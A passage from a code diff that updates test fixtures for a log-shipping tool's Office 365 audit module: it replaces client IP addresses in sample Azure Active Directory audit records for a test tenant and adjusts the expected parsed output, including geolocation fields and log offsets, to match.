Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"81.2.69.145","InterSystemsId":"ba292e5a-eb25-4c5e-950f-d56d9b92e5e3","IntraSystemId":"60feb7be-1cc1-410a-b9b5-d419e4882844","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
+{"CreationTime":"2021-02-04T16:32:42","Id":"fa3a0492-4781-412a-b27e-2c23c15e542e","Operation":"Update user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"67.43.156.15","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"UserType\":\"Member\",\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated Properties","NewValue":"","OldValue":""},{"Name":"ActorId.ServicePrincipalNames","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"SPN","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"TargetId.UserType","NewValue":"Member","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"67.43.156.15","InterSystemsId":"84246598-0c5b-4efc-b596-6b8e816c07f8","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
+{"CreationTime":"2021-02-04T16:32:42","Id":"608f941b-1724-49d9-b2f2-7c97898270f0","Operation":"Update StsRefreshTokenValidFrom Timestamp.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"67.43.156.15","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated Properties","NewValue":"","OldValue":""},{"Name":"ActorId.ServicePrincipalNames","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"SPN","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"67.43.156.15","InterSystemsId":"84246598-0c5b-4efc-b596-6b8e816c07f8","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
 {"CreationTime":"2021-02-04T16:33:17","Id":"1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd","Operation":"Delete user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Is Hard Deleted","NewValue":"False","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"3e7b36e7-caba-4d7a-ae08-07f0a716135c","IntraSystemId":"995e2026-17cc-4599-8f63-b3f3556d784b","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
 {"CreationTime":"2021-02-04T16:33:14","Id":"4a27de4c-a2dd-4825-8f7f-6a623b3060ec","Operation":"Change user license.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"443c61f9-900a-46cd-906f-7de2d16bd7b0","IntraSystemId":"74634e79-78c4-4335-8776-8afc267f5329","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
diff --git a/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log-expected.json b/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log-expected.json
index 2b9c5c2a0921..40efec8206dd 100644
--- a/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log-expected.json
@@ -323,8 +323,8 @@
     },
     {
         "@timestamp": "2021-02-04T16:31:54.000Z",
-        "client.address": "20.190.129.100",
-        "client.ip": "20.190.129.100",
+        "client.address": "81.2.69.145",
+        "client.ip": "81.2.69.145",
         "event.action": "Add member to role.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -372,9 +372,9 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "20.190.129.100",
+        "o365.audit.ActorIpAddress": "81.2.69.145",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "20.190.129.100",
+        "o365.audit.ClientIP": "81.2.69.145",
         "o365.audit.CreationTime": "2021-02-04T16:31:54",
         "o365.audit.ExtendedProperties.additionalDetails": "{}",
         "o365.audit.ExtendedProperties.extendedAuditEventCategory": "Role",
@@ -424,20 +424,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "20.190.129.100",
+        "related.ip": "81.2.69.145",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Dublin",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "IE",
-        "source.geo.country_name": "Ireland",
-        "source.geo.location.lat": 53.3338,
-        "source.geo.location.lon": -6.2488,
-        "source.geo.region_iso_code": "IE-L",
-        "source.geo.region_name": "Leinster",
-        "source.ip": "20.190.129.100",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.145",
         "tags": [
             "forwarded"
         ],
@@ -462,7 +460,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 29455,
+        "log.offset": 29449,
         "o365.audit.Actor": [
             {
                 "ID": "21119711-1517-43d4-8138-b537dafad016",
@@ -554,7 +552,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 30817,
+        "log.offset": 30811,
         "o365.audit.Actor": [
             {
                 "ID": "21119711-1517-43d4-8138-b537dafad016",
@@ -632,8 +630,8 @@
     },
     {
         "@timestamp": "2021-02-04T16:31:54.000Z",
-        "client.address": "20.190.129.100",
-        "client.ip": "20.190.129.100",
+        "client.address": "81.2.69.145",
+        "client.ip": "81.2.69.145",
         "event.action": "Add member to role.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -648,7 +646,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 32157,
+        "log.offset": 32151,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -681,9 +679,9 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "20.190.129.100",
+        "o365.audit.ActorIpAddress": "81.2.69.145",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "20.190.129.100",
+        "o365.audit.ClientIP": "81.2.69.145",
         "o365.audit.CreationTime": "2021-02-04T16:31:54",
         "o365.audit.ExtendedProperties.additionalDetails": "{}",
         "o365.audit.ExtendedProperties.extendedAuditEventCategory": "Role",
@@ -733,20 +731,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "20.190.129.100",
+        "related.ip": "81.2.69.145",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Dublin",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "IE",
-        "source.geo.country_name": "Ireland",
-        "source.geo.location.lat": 53.3338,
-        "source.geo.location.lon": -6.2488,
-        "source.geo.region_iso_code": "IE-L",
-        "source.geo.region_name": "Leinster",
-        "source.ip": "20.190.129.100",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.145",
         "tags": [
             "forwarded"
         ],
@@ -757,8 +753,8 @@
     },
     {
         "@timestamp": "2021-02-04T16:32:42.000Z",
-        "client.address": "52.109.68.40",
-        "client.ip": "52.109.68.40",
+        "client.address": "67.43.156.15",
+        "client.ip": "67.43.156.15",
         "event.action": "modified-user-account",
         "event.category": "iam",
         "event.code": "AzureActiveDirectory",
@@ -776,7 +772,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 33960,
+        "log.offset": 33948,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -809,9 +805,9 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "52.109.68.40",
+        "o365.audit.ActorIpAddress": "67.43.156.15",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "52.109.68.40",
+        "o365.audit.ClientIP": "67.43.156.15",
         "o365.audit.CreationTime": "2021-02-04T16:32:42",
         "o365.audit.ExtendedProperties.additionalDetails": "{\"UserType\":\"Member\",\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}",
         "o365.audit.ExtendedProperties.extendedAuditEventCategory": "User",
@@ -861,23 +857,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.109.68.40",
+        "related.ip": "67.43.156.15",
         "related.user": [
             "newuser",
             "root"
         ],
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Paris",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8607,
-        "source.geo.location.lon": 2.3281,
-        "source.geo.region_iso_code": "FR-75",
-        "source.geo.region_name": "Paris",
-        "source.ip": "52.109.68.40",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.15",
         "tags": [
             "forwarded"
         ],
@@ -892,8 +884,8 @@
     },
     {
         "@timestamp": "2021-02-04T16:32:42.000Z",
-        "client.address": "52.109.68.40",
-        "client.ip": "52.109.68.40",
+        "client.address": "67.43.156.15",
+        "client.ip": "67.43.156.15",
         "event.action": "Update StsRefreshTokenValidFrom Timestamp.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -908,7 +900,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 38085,
+        "log.offset": 38073,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -941,9 +933,9 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "52.109.68.40",
+        "o365.audit.ActorIpAddress": "67.43.156.15",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "52.109.68.40",
+        "o365.audit.ClientIP": "67.43.156.15",
         "o365.audit.CreationTime": "2021-02-04T16:32:42",
         "o365.audit.ExtendedProperties.additionalDetails": "{\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}",
         "o365.audit.ExtendedProperties.extendedAuditEventCategory": "User",
@@ -991,20 +983,16 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.109.68.40",
+        "related.ip": "67.43.156.15",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Paris",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8607,
-        "source.geo.location.lon": 2.3281,
-        "source.geo.region_iso_code": "FR-75",
-        "source.geo.region_name": "Paris",
-        "source.ip": "52.109.68.40",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.15",
         "tags": [
             "forwarded"
         ],
@@ -1032,7 +1020,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 42153,
+        "log.offset": 42141,
         "o365.audit.Actor": [
             {
                 "ID": "21119711-1517-43d4-8138-b537dafad016",
@@ -1133,7 +1121,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 43608,
+        "log.offset": 43596,
         "o365.audit.Actor": [
             {
                 "ID": "21119711-1517-43d4-8138-b537dafad016",
diff --git a/x-pack/filebeat/module/o365/audit/test/08-azuread.log b/x-pack/filebeat/module/o365/audit/test/08-azuread.log
index 7f53e3e5cf9e..eebef64a07f0 100644
--- a/x-pack/filebeat/module/o365/audit/test/08-azuread.log
+++ b/x-pack/filebeat/module/o365/audit/test/08-azuread.log
@@ -1,100 +1,100 @@
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": 